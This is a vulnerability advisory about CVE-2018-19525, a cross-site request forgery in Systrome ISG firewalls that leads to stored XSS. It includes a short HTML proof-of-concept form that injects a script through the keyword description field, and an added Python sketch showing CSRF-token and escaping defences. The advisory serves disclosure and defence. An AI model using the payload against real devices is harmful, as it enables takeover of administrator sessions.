SYSTORME ISG Cross Site Request Forgery

Published 13 Feb 2019. Reported by Kaustubh G. Padwad. Source: Packet Storm (packetstormsecurity.com).

Authenticated XSRF leads to complete Account Takeover in SYSTORME ISG Product

=====================================================  
Authenticated XSRF leads to complete Account Takeover  
=====================================================  
  
.. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME ISG Products.  
CVE ID:- CVE-2018-19525  
Author: Kaustubh G. Padwad  
Vendor: Systrome Networks (http://systrome.com/about/)  
Products:  
1.ISG-600C  
2.ISG-600H  
3.ISG-800W  
  
  
Tested Version: ISG-V1.1-R2.1_TRUNK-20180914.bin (the respective build for the other models)  
Severity: High--Critical  
  
Advisory ID  
============  
KSA-Dev-002  
  
  
About the Product:  
==================  
  
Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7 security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.  
  
Description:   
============  
An issue was discovered on Systrome ISG-600C, ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add and /ui/?g=obj_keywords_addsave  
with resultant XSS, because of a lack of CSRF token validation.  
  
Additional Information  
======================  
The web interface of the ISG firewalls does not validate the CSRF token, and the ?g=obj_keywords_add page does not properly sanitize  
user input, which leads to XSS. By combining these two weaknesses, an XSRF request can be formed that leads to complete account takeover.  
  
[Vulnerability Type]  
====================  
Cross Site Request Forgery (CSRF)  
  
How to Reproduce: (POC):  
========================  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://192.168.1.200/ui/?g=obj_keywords_add" method="POST">  
<input type="hidden" name="name" value="xsrf" />  
<input type="hidden" name="description" value="<svg><script>//" />  
<input type="hidden" name="NewLine;confirm(1338);</script </svg>" value="" />  
<input type="hidden" name="keyword" value="xsrf" />  
<input type="hidden" name="submit_post" value="obj_keywords_addsave" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
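As an added example (not part of the advisory, and not the vendor's code), the following Python sketch of a hardened obj_keywords_addsave handler shows the two server-side controls whose absence the advisory describes: a per-session synchronizer token compared in constant time (backed by an Origin/Referer check), and HTML-escaping of the stored fields at output time so that a description such as `<svg><script>//` renders as text. The names UI_ORIGIN, csrf_check, save_keyword and render_row, and the attacker-page origin, are assumptions constructed for the example; the field set mirrors the PoC form above.

```python
import hmac
import html
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Origin of the management UI itself (taken from the PoC form action above).
UI_ORIGIN = "https://192.168.1.200"


def issue_csrf_token() -> str:
    """Per-session synchronizer token: the server keeps it in the session and
    embeds it as a hidden field in every state-changing form."""
    return secrets.token_urlsafe(32)


def csrf_check(headers: Dict[str, str], form: Dict[str, str],
               session_token: str) -> Tuple[bool, str]:
    """Return (ok, reason) for a state-changing POST.

    1. If the browser sent Origin (or Referer), it must match the UI's own
       origin; a form auto-submitted from another site carries that site's.
    2. The form must carry the session's token, compared in constant time.
       This check always runs, so a request that omits the token (as the
       PoC form does) is rejected even when no Origin/Referer is present.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if source:
        parts = urlsplit(source)
        if "%s://%s" % (parts.scheme, parts.netloc) != UI_ORIGIN:
            return False, "cross-origin request"
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid csrf token"
    return True, "ok"


def save_keyword(headers, form, session_token, store):
    """Hypothetical hardened obj_keywords_addsave handler: refuse forged
    requests, store the raw fields, and never treat them as HTML."""
    ok, reason = csrf_check(headers, form, session_token)
    if not ok:
        return {"status": 403, "reason": reason}
    store[form.get("name", "")] = {
        "description": form.get("description", ""),
        "keyword": form.get("keyword", ""),
    }
    return {"status": 200, "reason": "saved"}


def render_row(name, entry):
    """Escape every field at output time, so stored markup is shown as text."""
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        html.escape(name, quote=True),
        html.escape(entry["description"], quote=True),
        html.escape(entry["keyword"], quote=True),
    )


# Constructed sample input: the field set of the PoC form above, as it would
# arrive when auto-submitted from a page on another origin (origin is made up).
FORGED_HEADERS = {"Origin": "https://attacker-page.example"}
FORGED_FORM = {"name": "xsrf", "description": "<svg><script>//",
               "keyword": "xsrf", "submit_post": "obj_keywords_addsave"}


def demo():
    store = {}
    session_token = issue_csrf_token()
    # 1. The forged cross-site request: blocked by the origin check.
    forged = save_keyword(FORGED_HEADERS, FORGED_FORM, session_token, store)
    # 2. Same origin but no token (stale or tampered form): blocked by the token check.
    no_token = save_keyword({"Origin": UI_ORIGIN}, FORGED_FORM, session_token, store)
    # 3. Legitimate submission carrying the session token: accepted, and the
    #    markup in "description" is neutralised when the row is rendered.
    legit_form = dict(FORGED_FORM, csrf_token=session_token)
    legit = save_keyword({"Origin": UI_ORIGIN}, legit_form, session_token, store)
    row = render_row("xsrf", store["xsrf"])
    return forged, no_token, legit, row


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The origin check alone is not sufficient (some clients and privacy settings strip Referer, and Origin is absent on some same-site navigations), which is why the token comparison runs unconditionally; escaping at render time rather than at storage time keeps the stored data intact while guaranteeing that every output path is encoded.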
  
  
  
[Affected Component]  
obj_keywords_add, obj_keywords_addsave (CSRF)  
  
------------------------------------------  
  
[Attack Type]  
Remote  
  
------------------------------------------  
  
[Impact Code execution]  
true  
  
------------------------------------------  
  
[Attack Vectors]  
Once the victim opens the crafted URL, the device is compromised.  
  
Mitigation  
==========  
  
The vendor is working on a fix and expects to provide a solution, possibly by the first week of December.  
  
Disclosure:   
===========  
02-Nov-2018 Discovered the vulnerability  
15-Nov-2018 Reported to vendor  
25-Nov-2018 Requested CVE ID  
26-Nov-2018 CVE assigned  
  
  
[Vendor of Product]  
Systrome Networks (http://systrome.com/about/)  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://s3curityb3ast.github.io/  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
  
  
  

Vulners AI Score: 0.1 (low risk). EPSS: 0.0042.